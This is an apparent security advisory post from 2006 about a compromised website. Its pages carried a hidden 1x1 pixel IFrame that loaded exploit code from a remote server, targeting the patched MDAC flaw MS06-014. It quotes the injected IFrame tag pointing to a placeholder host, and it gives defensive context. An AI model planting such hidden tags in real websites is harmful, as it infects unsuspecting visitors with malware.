ISC reader Glenn Jarvis wrote in to tell us about a website that installs a malicious executable in the temporary folder of the victim's system. A look at the source code of the website's top page revealed a tiny IFrame tag that retrieved another page from a remote server. The size of the in-line frame is 1 pixel by 1 pixel, so it is not visible to the visitor of the site unless the person looks at the source code:
<iframe src= http://remote.example.com/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe><html>
The exploit itself targeted a vulnerability that was patched in the update to Internet Explorer that Microsoft released on April 11, 2006. Microsoft Security Bulletin MS06-014 briefly describes the problem:
Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution (911562)
A remote code execution vulnerability exists in the RDS.Dataspace ActiveX control that is provided as part of the ActiveX Data Objects (ADO) and that is distributed in MDAC. An attacker who successfully exploited this vulnerability could take complete control of an affected system.
Cumulative Security Update for Internet Explorer (912812), which was also released on April 11th, according to Microsoft Security Bulletin MS06-013, strengthens security settings for the Internet zone on Internet Explorer. These settings render the exploit ineffective even if the potential victim did not apply the 911562 patch referenced above. The cumulative update sets the following settings to Disable:
Hidden IFrame elements continue to be a popular way for targeting website visitors. After breaking into a server, the attacker modifies its HTML code, using a hidden IFrame tag to retrieve exploit code from another system. Maintainers of the compromised website typically don't know that they are infecting their visitors for quite some time.
ISC Handler on Duty
Jun 4th 2006
1 decade ago